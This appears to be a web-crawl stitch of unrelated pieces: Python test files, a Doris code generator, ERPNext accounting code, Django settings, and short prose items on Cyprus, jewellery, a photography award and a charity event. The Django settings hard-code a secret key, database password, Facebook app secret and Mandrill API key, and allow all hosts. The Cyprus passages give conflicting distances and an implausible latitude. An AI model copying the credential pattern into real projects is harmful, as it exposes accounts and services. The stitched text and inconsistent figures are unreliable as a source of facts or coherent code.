import json
from . import load_fixture
from contextlib import contextmanager
from github3.repos.repo import Repository
from github3.pulls import PullRequest
from lintreview.config import load_config
from lintreview.repo import GithubRepository
from lintreview.repo import GithubPullRequest
from mock import Mock, patch, sentinel
from nose.tools import eq_, ok_
from unittest import TestCase
config = load_config()
class TestGithubRepository(TestCase):
def setUp(self):
fixture = load_fixture('pull_request.json')
self.repo_model = Repository(json.loads(fixture))
@patch('lintreview.repo.github')
def test_repository(self, github_mock):
github_mock.get_repository.return_value = self.repo_model
repo = GithubRepository(config, 'markstory', 'lint-test')
eq_(self.repo_model, repo.repository())
github_mock.get_repository.assert_called_with(
config,
'markstory',
'lint-test')
def test_pull_request(self):
model = self.repo_model
model.pull_request = Mock(return_value=sentinel.pull_request)
repo = GithubRepository(config, 'markstory', 'lint-test')
repo.repository = lambda: self.repo_model
pull = repo.pull_request(1)
ok_(isinstance(pull, GithubPullRequest),
'Should be wrapped object')
def test_ensure_label__missing(self):
model = self.repo_model
model.label = Mock(return_value=None)
model.create_label = Mock()
repo = GithubRepository(config, 'markstory', 'lint-test')
repo.repository = lambda: self.repo_model
repo.ensure_label('A label')
model.create_label.assert_called_with(
name='A label',
color='bfe5bf')
def test_ensure_label__exists(self):
model = self.repo_model
model.create_label = Mock()
model.label = Mock(return_value=True)
repo = GithubRepository(config, 'markstory', 'lint-test')
repo.repository = lambda: self.repo_model
repo.ensure_label('A label')
eq_(False, model.create_label.called)
def test_create_status(self):
model = self.repo_model
model.create_status = Mock()
repo = GithubRepository(config, 'markstory', 'lint-test')
repo.repository = lambda: self.repo_model
repo.create_status('abc123', 'succeeded', 'all good')
model.create_status.assert_called_with(
'abc123',
'succeeded',
None,
'all good',
'lintreview')
class TestGithubPullRequest(TestCase):
def setUp(self):
fixture = load_fixture('pull_request.json')
self.model = PullRequest(json.loads(fixture)['pull_request'])
def test_is_private(self):
pull = GithubPullRequest(self.model)
assert False is pull.is_private
def test_display_name(self):
pull = GithubPullRequest(self.model)
assert 'markstory/lint-test#1' == pull.display_name
def test_number(self):
pull = GithubPullRequest(self.model)
assert 1 == pull.number
def test_head(self):
pull = GithubPullRequest(self.model)
expected = '53cb70abadcb3237dcb2aa2b1f24dcf7bcc7d68e'
assert expected == pull.head
def test_clone_url(self):
pull = GithubPullRequest(self.model)
expected = 'https://github.com/contributor/lint-test.git'
assert expected == pull.clone_url
def test_base_repo_url(self):
pull = GithubPullRequest(self.model)
expected = 'https://github.com/markstory/lint-test.git'
assert expected == pull.base_repo_url
def test_target_branch(self):
pull = GithubPullRequest(self.model)
assert 'master' == pull.target_branch
def test_remove_label__label_exists(self):
pull = GithubPullRequest(self.model)
label_name = 'No lint errors'
with add_ok_label(pull, label_name):
pull.remove_label(label_name)
pull.pull.issue().remove_label.assert_called_with(label_name)
def test_remove_label__label_missing(self):
pull = GithubPullRequest(self.model)
label_name = 'No lint errors'
with add_ok_label(pull, 'Other label'):
pull.remove_label(label_name)
assert 0 == pull.pull.issue().remove_label.call_count
def test_add_label(self):
mock_issue = Mock()
self.model.issue = lambda: mock_issue
pull = GithubPullRequest(self.model)
pull.add_label('No lint errors')
mock_issue.add_labels.assert_called_with('No lint errors')
def test_create_comment(self):
self.model.create_comment = Mock()
pull = GithubPullRequest(self.model)
text = 'No lint errors found'
pull.create_comment(text)
self.model.create_comment.assert_called_with(text)
def test_create_review_comment(self):
self.model.create_review_comment = Mock()
pull = GithubPullRequest(self.model)
comment = {
'body': 'bad whitespace',
'commit_id': 'abc123',
'path': 'some/file.php',
'position': 12
}
pull.create_review_comment(**comment)
self.model.create_review_comment.assert_called_with(
comment['body'],
comment['commit_id'],
comment['path'],
comment['position'])
@contextmanager
def add_ok_label(pull_request, *labels, **kw):
if labels:
class Label(object):
def __init__(self, name):
self.name = name
mock_issue = Mock()
mock_issue.labels.return_value = [Label(n) for n in labels]
pull_request.pull.issue = lambda: mock_issue
yield
|
Cyprus is an island in the eastern Mediterranean Sea, the third largest in that sea, and lies roughly 100 kilometres south of Turkey and 120 kilometres west of Syria. Geographically, Cyprus belongs to southwestern Asia. However, because Cyprus historically and culturally followed the course of Hellenism as a whole, it can be considered part of the West and of Europe.
Cyprus is an island in the Mediterranean. Turkey lies 65 km to its north, Syria 112 km to its east, with Israel at 267 km and Lebanon at 162 km; Egypt lies 418 km to its south and Greece 965 km to its west. The island of Cyprus lies between latitudes 30.33 and 35.41 and longitudes 32.23 and 34.55. The KKTC (Turkish Republic of Northern Cyprus) has an area of 3,355 km². Roughly half of the island's coastline lies within the KKTC's borders.
The Republic of Cyprus is a Eurasian island nation in the eastern part of the Mediterranean Sea south of the Anatolian peninsula (Asia Minor). A Turkish invasion in 1974 led to the establishment of a separatist government to govern the invaded area, currently styling itself the Turkish Republic of Northern Cyprus, separated from the south by the UN-controlled Green Line and recognized only by Turkey. The Republic of Cyprus has been a member state of the European Union since 1 May 2004. The British possess Akrotiri and Dhekelia on the island. Cyprus lies south of Turkey, west of Syria and Lebanon and north of Egypt.
Location of Akrotiri and Dhekelia on Cyprus.
Map of Northern Cyprus.
This section holds a short summary of the history of the area of present-day Cyprus, illustrated with maps, including historical maps of former countries and empires that included present-day Cyprus.
The Kingdom of Cyprus in 1265 (William R. Shepherd, Historical Atlas, 1911).
A former British colony, the Republic of Cyprus gained independence in 1960, while the United Kingdom retained two Sovereign Base Areas. Following 11 years of alternating intercommunal violence and peaceful attempts at reconciliation, which led to the dispatch of UN peacekeeping forces in 1964, Turkey launched a two-stage invasion of the island in 1974 in response to an Athens-engineered coup aimed at uniting the island with Greece. The invasion led to the internal displacement of thousands of Greek and Turkish Cypriots and the subsequent establishment of a separatist regime to govern the invaded area, currently styling itself the Turkish Republic of Northern Cyprus, separated from the south by the UN-controlled Green Line and recognized only by Turkey.
Romanization according to ISO 843: Kýpros - Kypriakḗ Dēmokratía.
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
This script will generate two headers that describe all of the clang cross compiled
functions.
The script outputs (run: 'doris/common/function-registry/gen_functions.py')
- be/src/generated-sources/doris-ir/doris-ir-functions.h
This file contains enums for all of the cross compiled functions
- be/src/generated-sources/doris-ir/doris-ir-function-names.h
This file contains a mapping of <string, enum>
Mapping of enum to compiled function name. The compiled function name only has to
be a substring of the actual, mangled compiler generated name.
TODO: should we work out the mangling rules?
"""
import string
import os
ir_functions = [
["AGG_NODE_PROCESS_ROW_BATCH_WITH_GROUPING", "process_row_batch_with_grouping"],
["AGG_NODE_PROCESS_ROW_BATCH_NO_GROUPING", "process_row_batch_no_grouping"],
# ["EXPR_GET_VALUE", "IrExprGetValue"],
# ["HASH_CRC", "IrCrcHash"],
# ["HASH_FVN", "IrFvnHash"],
["HASH_JOIN_PROCESS_BUILD_BATCH", "12HashJoinNode19process_build_batch"],
["HASH_JOIN_PROCESS_PROBE_BATCH", "12HashJoinNode19process_probe_batch"],
["EXPR_GET_BOOLEAN_VAL", "4Expr15get_boolean_val"],
["EXPR_GET_TINYINT_VAL", "4Expr16get_tiny_int_val"],
["EXPR_GET_SMALLINT_VAL", "4Expr17get_small_int_val"],
["EXPR_GET_INT_VAL", "4Expr11get_int_val"],
["EXPR_GET_BIGINT_VAL", "4Expr15get_big_int_val"],
["EXPR_GET_LARGEINT_VAL", "4Expr17get_large_int_val"],
["EXPR_GET_FLOAT_VAL", "4Expr13get_float_val"],
["EXPR_GET_DOUBLE_VAL", "4Expr14get_double_val"],
["EXPR_GET_STRING_VAL", "4Expr14get_string_val"],
["EXPR_GET_DATETIME_VAL", "4Expr16get_datetime_val"],
["EXPR_GET_DECIMAL_VAL", "4Expr15get_decimal_val"],
["HASH_CRC", "ir_crc_hash"],
["HASH_FNV", "ir_fnv_hash"],
["FROM_DECIMAL_VAL", "16from_decimal_val"],
["TO_DECIMAL_VAL", "14to_decimal_val"],
["FROM_DATETIME_VAL", "17from_datetime_val"],
["TO_DATETIME_VAL", "15to_datetime_val"],
["IR_STRING_COMPARE", "ir_string_compare"],
# ["STRING_VALUE_EQ", "StringValueEQ"],
# ["STRING_VALUE_NE", "StringValueNE"],
# ["STRING_VALUE_GE", "StringValueGE"],
# ["STRING_VALUE_GT", "StringValueGT"],
# ["STRING_VALUE_LT", "StringValueLT"],
# ["STRING_VALUE_LE", "StringValueLE"],
# ["STRING_TO_BOOL", "IrStringToBool"],
# ["STRING_TO_INT8", "IrStringToInt8"],
# ["STRING_TO_INT16", "IrStringToInt16"],
# ["STRING_TO_INT32", "IrStringToInt32"],
# ["STRING_TO_INT64", "IrStringToInt64"],
# ["STRING_TO_FLOAT", "IrStringToFloat"],
# ["STRING_TO_DOUBLE", "IrStringToDouble"],
# ["STRING_IS_NULL", "IrIsNullString"],
["HLL_UPDATE_BOOLEAN", "hll_updateIN8doris_udf10BooleanVal"],
["HLL_UPDATE_TINYINT", "hll_updateIN8doris_udf10TinyIntVal"],
["HLL_UPDATE_SMALLINT", "hll_updateIN8doris_udf11SmallIntVal"],
["HLL_UPDATE_INT", "hll_updateIN8doris_udf6IntVal"],
["HLL_UPDATE_BIGINT", "hll_updateIN8doris_udf9BigIntVal"],
["HLL_UPDATE_FLOAT", "hll_updateIN8doris_udf8FloatVal"],
["HLL_UPDATE_DOUBLE", "hll_updateIN8doris_udf9DoubleVal"],
["HLL_UPDATE_STRING", "hll_updateIN8doris_udf9StringVal"],
["HLL_UPDATE_TIMESTAMP", "hll_updateIN8doris_udf11DateTimeVal"],
["HLL_UPDATE_DECIMAL", "hll_updateIN8doris_udf10DecimalVal"],
["HLL_MERGE", "hll_merge"],
["CODEGEN_ANYVAL_DATETIME_VAL_EQ", "datetime_val_eq"],
["CODEGEN_ANYVAL_STRING_VAL_EQ", "string_val_eq"],
["CODEGEN_ANYVAL_DECIMAL_VAL_EQ", "decimal_val_eq"],
["CODEGEN_ANYVAL_DATETIME_VALUE_EQ", "datetime_value_eq"],
["CODEGEN_ANYVAL_STRING_VALUE_EQ", "string_value_eq"],
["CODEGEN_ANYVAL_DECIMAL_VALUE_EQ", "decimal_value_eq"],
["RAW_VALUE_COMPARE", "8RawValue7compare"],
]
enums_preamble = '\
// Licensed to the Apache Software Foundation (ASF) under one \n\
// or more contributor license agreements. See the NOTICE file \n\
// distributed with this work for additional information \n\
// regarding copyright ownership. The ASF licenses this file \n\
// to you under the Apache License, Version 2.0 (the \n\
// "License"); you may not use this file except in compliance \n\
// with the License. You may obtain a copy of the License at \n\
// \n\
// http://www.apache.org/licenses/LICENSE-2.0 \n\
// \n\
// Unless required by applicable law or agreed to in writing, \n\
// software distributed under the License is distributed on an \n\
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY \n\
// KIND, either express or implied. See the License for the \n\
// specific language governing permissions and limitations \n\
// under the License. \n\
\n\
// This is a generated file, DO NOT EDIT IT.\n\
// To add new functions, see be/src/codegen/gen_ir_descriptions.py.\n\
\n\
#ifndef DORIS_IR_FUNCTIONS_H\n\
#define DORIS_IR_FUNCTIONS_H\n\
\n\
namespace doris {\n\
\n\
class IRFunction {\n\
public:\n\
enum Type {\n'
enums_epilogue = '\
};\n\
};\n\
\n\
}\n\
\n\
#endif\n'
names_preamble = '\
// Licensed to the Apache Software Foundation (ASF) under one \n\
// or more contributor license agreements. See the NOTICE file \n\
// distributed with this work for additional information \n\
// regarding copyright ownership. The ASF licenses this file \n\
// to you under the Apache License, Version 2.0 (the \n\
// "License"); you may not use this file except in compliance \n\
// with the License. You may obtain a copy of the License at \n\
// \n\
// http://www.apache.org/licenses/LICENSE-2.0 \n\
// \n\
// Unless required by applicable law or agreed to in writing, \n\
// software distributed under the License is distributed on an \n\
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY \n\
// KIND, either express or implied. See the License for the \n\
// specific language governing permissions and limitations \n\
// under the License. \n\
\n\
// This is a generated file, DO NOT EDIT IT.\n\
// To add new functions, see be/src/codegen/gen_ir_descriptions.py.\n\
\n\
#ifndef DORIS_IR_FUNCTION_NAMES_H\n\
#define DORIS_IR_FUNCTION_NAMES_H\n\
\n\
#include "doris_ir/doris_ir_functions.h"\n\
\n\
namespace doris {\n\
\n\
static struct {\n\
std::string fn_name; \n\
IRFunction::Type fn; \n\
} FN_MAPPINGS[] = {\n'
names_epilogue = '\
};\n\
\n\
}\n\
\n\
#endif\n'
BE_PATH = os.environ['DORIS_HOME'] + "/gensrc/build/doris_ir/"
if not os.path.exists(BE_PATH):
os.makedirs(BE_PATH)
if __name__ == "__main__":
print "Generating IR description files"
enums_file = open(BE_PATH + 'doris_ir_functions.h', 'w')
enums_file.write(enums_preamble)
names_file = open(BE_PATH + 'doris_ir_names.h', 'w')
names_file.write(names_preamble)
idx = 0
enums_file.write(" FN_START = " + str(idx) + ",\n")
for fn in ir_functions:
enum = fn[0]
fn_name = fn[1]
enums_file.write(" " + enum + " = " + str(idx) + ",\n")
names_file.write(" { \"" + fn_name + "\", IRFunction::" + enum + " },\n")
idx = idx + 1
enums_file.write(" FN_END = " + str(idx) + "\n")
enums_file.write(enums_epilogue)
enums_file.close()
names_file.write(names_epilogue)
names_file.close()
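# For orientation, here is roughly what the generated doris_ir_functions.h
# enum body will look like, reconstructed from the preamble strings and the
# write loop above (FN_START deliberately shares the value 0 with the first
# function, and FN_END equals the number of registered functions, 40 for the
# list above):
#
#   enum Type {
#     FN_START = 0,
#     AGG_NODE_PROCESS_ROW_BATCH_WITH_GROUPING = 0,
#     AGG_NODE_PROCESS_ROW_BATCH_NO_GROUPING = 1,
#     ...
#     FN_END = 40
#   };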
|
Single Gemstone on a 16" silk cord. Simple and beautiful. Silk colors and gemstones can be customized.
|
# Copyright 2014 Google Inc. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import caniusepypy as ciu
from caniusepypy.test import unittest
import tempfile
EXAMPLE_METADATA = """Metadata-Version: 1.2
Name: TestingMetadata
Version: 0.5
Summary: testing
Home-page: http://github.com/brettcannon/caniusepypy
Author: Brett Cannon
Author-email: [email protected]
License: Apache
Requires-Dist: Twisted
"""
class CheckTest(unittest.TestCase):
# When testing input, make sure to use project names that **will** lead to
# a False answer since unknown projects are skipped.
def test_success(self):
self.assertTrue(ciu.check(projects=['cryptography']))
def test_failure(self):
self.assertFalse(ciu.check(projects=['Twisted']))
def test_requirements(self):
with tempfile.NamedTemporaryFile('w') as file:
file.write('Twisted\n')
file.flush()
self.assertFalse(ciu.check(requirements_paths=[file.name]))
def test_metadata(self):
self.assertFalse(ciu.check(metadata=[EXAMPLE_METADATA]))
def test_projects(self):
# Implicitly done by test_success and test_failure.
pass
def test_case_insensitivity(self):
self.assertFalse(ciu.check(projects=['TwIsTeD']))
def test_ignore_missing_projects(self):
self.assertTrue(ciu.check(projects=['sdfsjdfsdlfk;jasdflkjasdfdsfsdf']))
|
The Worldwide Photography Gala Awards announces Winners of the 9th Julia Margaret Cameron Award for Women Photographers (JMCA). Documentary and Travel Photographer Marja Schwartz was awarded for her winning entry.
Description: Portrait of a baby from the Maasai tribe on the back of his mother, Ngorongoro Crater, Tanzania, Africa.
Marja Schwartz received the 9th Julia Margaret Cameron Award for Women Photographers for her winning entry “Piggyback”.
531 women photographers from 50 countries submitted work for this edition. The juror Andréa Holzherr, Curator (Ecole du Louvre / Sorbonne) and Director of Global Exhibitions of Magnum Photos, selected the awardees and is pleased to declare that Marja Schwartz was awarded Winner in Portraits / Single Image for the entry “Piggyback”.
The works of the winners will be exhibited at the Berlin Foto Biennale and 4th Biennial of Fine Art and Documentary Photography during the European Month of Photography in Berlin in October 2016. 446 contemporary artists from 41 countries are participating alongside Magnum photographer Steve McCurry.
|
# Copyright (C) 2010 Jeremy S. Sanders
# Email: Jeremy Sanders <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
##############################################################################
from .field import *
from .datasetplugin import *
from .importplugin import *
from .toolsplugin import *
from .votable import *
# backward compatibility
ImportDataset1D = Dataset1D
ImportDataset2D = Dataset2D
ImportDatasetText = DatasetText
ImportField = Field
ImportFieldCheck = FieldBool
ImportFieldText = FieldText
ImportFieldFloat = FieldFloat
ImportFieldInt = FieldInt
ImportFieldCombo = FieldCombo
|
It was a great night catching up with some of our volunteers at Killen’s Burgers tonight, where a couple of them braved the 99 Burger! A portion of the purchase is donated to the JJWF.
“We get headlines, and we’re playing a game. These guys don’t get the headlines, but they’re the ones that save lives. Between them, and the police, and the military – I mean – those are people that are doing stuff that matters because they are true heroes…”- JJ Watt See JJ firefighter training here.
Did you miss SportsCenter’s “My Wish” segment featuring 9-year-old Will Martinez and JJ Watt? No need to worry! You can check out the inspiring segment here.
|
# -*- encoding: utf-8 -*-
"""
Django settings for dp project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '@+d%g-+1%))$q!un*qx6pv&vivpcz7yzmd7#3v)56#q&-5n*&@'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = (
'grappelli',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'corsheaders',
'social.apps.django_app.default',
'django_extensions',
'rest_framework',
'rest_framework.authtoken',
'djrill',
'tournaments',
'games',
'notifications',
'contact',
'homepage',
)
MIDDLEWARE_CLASSES = (
'corsheaders.middleware.CorsMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'dp.urls'
WSGI_APPLICATION = 'dp.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
import dj_database_url
DATABASES = {
'default': dj_database_url.config(default='postgres://dp:DPfutbol1983%@localhost:5432/dp')
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'es-ar'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
STATIC_URL = '/static/'
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'django.contrib.staticfiles.finders.FileSystemFinder',
)
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
TEMPLATE_DIRS = (
os.path.join(BASE_DIR, 'templates'),
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.request',
'django.core.context_processors.static',
'django.contrib.messages.context_processors.messages',
)
AUTHENTICATION_BACKENDS = (
'social.backends.facebook.FacebookAppOAuth2',
'social.backends.facebook.FacebookOAuth2',
'django.contrib.auth.backends.ModelBackend',
)
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
#'rest_framework.authentication.SessionAuthentication',
'rest_framework.authentication.TokenAuthentication',
)
}
CORS_ORIGIN_WHITELIST = (
'localhost:9090',
'localhost:3000',
'127.0.0.1:9000',
'dpfutbol.com',
'www.dpfutbol.com',
)
CORS_ALLOW_HEADERS = (
'x-requested-with',
'content-type',
'accept',
'origin',
'authorization',
'x-csrftoken',
'WWW-Authenticate',
)
SOCIAL_AUTH_FACEBOOK_KEY = '1480234775555747'
SOCIAL_AUTH_FACEBOOK_SECRET = 'ab0980264107f9856823e3650a1871da'
SOCIAL_AUTH_FACEBOOK_SCOPE = ['email']
AUTH_USER_MODEL = 'games.Player'
REDIS_HOST = 'localhost'
REDIS_PORT = 6379
# MANDRILL
MANDRILL_API_KEY = '4rbqFI0BJL8ryoHT7CRGLw'
EMAIL_BACKEND = "djrill.mail.backends.djrill.DjrillBackend"
# CELERY SETTINGS
BROKER_URL = 'redis://localhost:6379/0'
CELERY_ACCEPT_CONTENT = ['json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
GRAPPELLI_ADMIN_TITLE = u"DP Fútbol"
|
> You're using exec; once that line is reached, bash replaces itself with wmii.
> wmii || xmessage "Restart..."
> exit, it's all fine.
auto-pilot + your fingers acting with muscle memory).
|
# -*- coding: utf-8 -*-
# Copyright (c) 2019, Frappe Technologies Pvt. Ltd. and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe, json
from frappe import _
from frappe.utils import flt, getdate, nowdate, add_days
from erpnext.controllers.accounts_controller import AccountsController
from erpnext.accounts.general_ledger import make_gl_entries
class InvoiceDiscounting(AccountsController):
def validate(self):
self.validate_mandatory()
self.calculate_total_amount()
self.set_status()
self.set_end_date()
def set_end_date(self):
if self.loan_start_date and self.loan_period:
self.loan_end_date = add_days(self.loan_start_date, self.loan_period)
def validate_mandatory(self):
if self.docstatus == 1 and not (self.loan_start_date and self.loan_period):
frappe.throw(_("Loan Start Date and Loan Period are mandatory to save the Invoice Discounting"))
def calculate_total_amount(self):
self.total_amount = sum([flt(d.outstanding_amount) for d in self.invoices])
def on_submit(self):
self.make_gl_entries()
def on_cancel(self):
self.set_status()
self.make_gl_entries()
def set_status(self):
self.status = "Draft"
if self.docstatus == 1:
self.status = "Sanctioned"
elif self.docstatus == 2:
self.status = "Cancelled"
def make_gl_entries(self):
company_currency = frappe.get_cached_value('Company', self.company, "default_currency")
gl_entries = []
for d in self.invoices:
inv = frappe.db.get_value("Sales Invoice", d.sales_invoice,
["debit_to", "party_account_currency", "conversion_rate", "cost_center"], as_dict=1)
if d.outstanding_amount:
outstanding_in_company_currency = flt(d.outstanding_amount * inv.conversion_rate,
d.precision("outstanding_amount"))
ar_credit_account_currency = frappe.get_cached_value("Account", self.accounts_receivable_credit, "currency")
gl_entries.append(self.get_gl_dict({
"account": inv.debit_to,
"party_type": "Customer",
"party": d.customer,
"against": self.accounts_receivable_credit,
"credit": outstanding_in_company_currency,
"credit_in_account_currency": outstanding_in_company_currency \
if inv.party_account_currency==company_currency else d.outstanding_amount,
"cost_center": inv.cost_center,
"against_voucher": d.sales_invoice,
"against_voucher_type": "Sales Invoice"
}, inv.party_account_currency))
gl_entries.append(self.get_gl_dict({
"account": self.accounts_receivable_credit,
"party_type": "Customer",
"party": d.customer,
"against": inv.debit_to,
"debit": outstanding_in_company_currency,
"debit_in_account_currency": outstanding_in_company_currency \
if ar_credit_account_currency==company_currency else d.outstanding_amount,
"cost_center": inv.cost_center,
"against_voucher": d.sales_invoice,
"against_voucher_type": "Sales Invoice"
}, ar_credit_account_currency))
make_gl_entries(gl_entries, cancel=(self.docstatus == 2), update_outstanding='No')
def create_disbursement_entry(self):
je = frappe.new_doc("Journal Entry")
je.voucher_type = 'Journal Entry'
je.company = self.company
je.remark = 'Loan Disbursement entry against Invoice Discounting: ' + self.name
je.append("accounts", {
"account": self.bank_account,
"debit_in_account_currency": flt(self.total_amount) - flt(self.bank_charges),
})
je.append("accounts", {
"account": self.bank_charges_account,
"debit_in_account_currency": flt(self.bank_charges)
})
je.append("accounts", {
"account": self.short_term_loan,
"credit_in_account_currency": flt(self.total_amount),
"reference_type": "Invoice Discounting",
"reference_name": self.name
})
for d in self.invoices:
je.append("accounts", {
"account": self.accounts_receivable_discounted,
"debit_in_account_currency": flt(d.outstanding_amount),
"reference_type": "Invoice Discounting",
"reference_name": self.name,
"party_type": "Customer",
"party": d.customer
})
je.append("accounts", {
"account": self.accounts_receivable_credit,
"credit_in_account_currency": flt(d.outstanding_amount),
"reference_type": "Invoice Discounting",
"reference_name": self.name,
"party_type": "Customer",
"party": d.customer
})
return je
def close_loan(self):
je = frappe.new_doc("Journal Entry")
je.voucher_type = 'Journal Entry'
je.company = self.company
je.remark = 'Loan Settlement entry against Invoice Discounting: ' + self.name
je.append("accounts", {
"account": self.short_term_loan,
"debit_in_account_currency": flt(self.total_amount),
"reference_type": "Invoice Discounting",
"reference_name": self.name,
})
je.append("accounts", {
"account": self.bank_account,
"credit_in_account_currency": flt(self.total_amount)
})
if getdate(self.loan_end_date) > getdate(nowdate()):
for d in self.invoices:
je.append("accounts", {
"account": self.accounts_receivable_discounted,
"credit_in_account_currency": flt(d.outstanding_amount),
"reference_type": "Invoice Discounting",
"reference_name": self.name,
"party_type": "Customer",
"party": d.customer
})
je.append("accounts", {
"account": self.accounts_receivable_unpaid,
"debit_in_account_currency": flt(d.outstanding_amount),
"reference_type": "Invoice Discounting",
"reference_name": self.name,
"party_type": "Customer",
"party": d.customer
})
return je
@frappe.whitelist()
def get_invoices(filters):
filters = frappe._dict(json.loads(filters))
cond = []
if filters.customer:
cond.append("customer=%(customer)s")
if filters.from_date:
cond.append("posting_date >= %(from_date)s")
if filters.to_date:
cond.append("posting_date <= %(to_date)s")
if filters.min_amount:
cond.append("base_grand_total >= %(min_amount)s")
if filters.max_amount:
cond.append("base_grand_total <= %(max_amount)s")
where_condition = ""
if cond:
where_condition += " and " + " and ".join(cond)
return frappe.db.sql("""
select
name as sales_invoice,
customer,
posting_date,
outstanding_amount
from `tabSales Invoice`
where
docstatus = 1
and outstanding_amount > 0
%s
""" % where_condition, filters, as_dict=1)
|
On industrial scale, nitric acid is prepared by reacting?
|
from modelmodel import behave
import numpy as np
SEED=45
def test_trials_trials():
prng = np.random.RandomState(SEED)
# Simplest trials is a trial: [1, ]
trials, prng = behave.trials.random(N=1, k=1, prng=prng)
assert np.allclose(trials, np.array([1,])), (
"simplest trials breaks")
# Does k work right?
trials, prng = behave.trials.random(N=1, k=10, prng=prng)
assert np.allclose(np.sum(trials), 10), "k is off"
# N?
trials, prng = behave.trials.random(N=2, k=1, prng=prng)
assert np.allclose(np.sum(trials), 3), "N is off"
# is L ok?
assert trials.shape[0] == 2, "l (N*k) is off"
def test_trials_jitter():
prng = np.random.RandomState(SEED)
# Jitter should not change N, k
trials, prng = behave.trials.random(2, 2, prng=prng)
trials, prng = behave.trials.jitter(trials, prng=prng)
assert np.allclose(np.sum(trials), 6), "N of k is off"
def test_probability_random():
prng = np.random.RandomState(SEED)
# Random ps should avg to 0.5
trials, prng = behave.trials.random(1, 1000, prng=prng)
l = trials.shape[0]
ps, prng = behave.probability.random(l, prng=prng)
assert np.allclose(np.mean(ps), .5, atol=.05), "Bad avg"
# dim check
assert ps.shape[0] == trials.shape[0], "l off"
# Same avg for N > 1 conds
trials, prng = behave.trials.random(3, 1000, prng=prng)
l = trials.shape[0]
ps, prng = behave.probability.random(l, prng=prng)
assert np.allclose(np.mean(ps), .5, atol=.05), "Bad avg with 3 cond"
# dim check
assert ps.shape[0] == trials.shape[0], "l off"
def test_probability_learn():
prng = np.random.RandomState(SEED)
# Vis
trials, prng = behave.trials.random(1, 20, prng=prng)
l = trials.shape[0]
ps, prng = behave.probability.learn(l, loc=3, prng=prng)
# dim check
assert ps.shape[0] == trials.shape[0], "l off"
print(ps)
# ps should avg to more than 0.5
trials, prng = behave.trials.random(1, 1000, prng=prng)
l = trials.shape[0]
ps, prng = behave.probability.learn(l, loc=3, prng=prng)
assert np.mean(ps) > .5, "Bad avg"
# dim check
assert ps.shape[0] == trials.shape[0], "l off"
def test_acc_accuracy():
prng = np.random.RandomState(SEED)
# For lots of random ps acc should avg to 0.5
k = 5000
ps = np.asarray([0.5] * k)
acc, prng = behave.acc.accuracy(ps, prng=prng)
assert np.allclose(np.sum(acc)/float(k), .5, atol=.05)
# dim check
assert ps.shape == acc.shape, "l off"
def test_behave_random():
prng = np.random.RandomState(SEED)
trials, acc, ps, prng = behave.behave.random(N=1, k=5, prng=prng)
# dim check
assert trials.shape == acc.shape, "l off: trials and acc"
assert trials.shape == ps.shape, "l off: trials and ps"
# Check trials comp, then ps and acc avg
k = 3000
trials, acc, ps, prng = behave.behave.random(N=1, k=k, prng=prng)
assert np.allclose(np.sum(trials), k), "k is off"
assert np.allclose(np.unique(trials), np.array([0, 1])), "N is off"
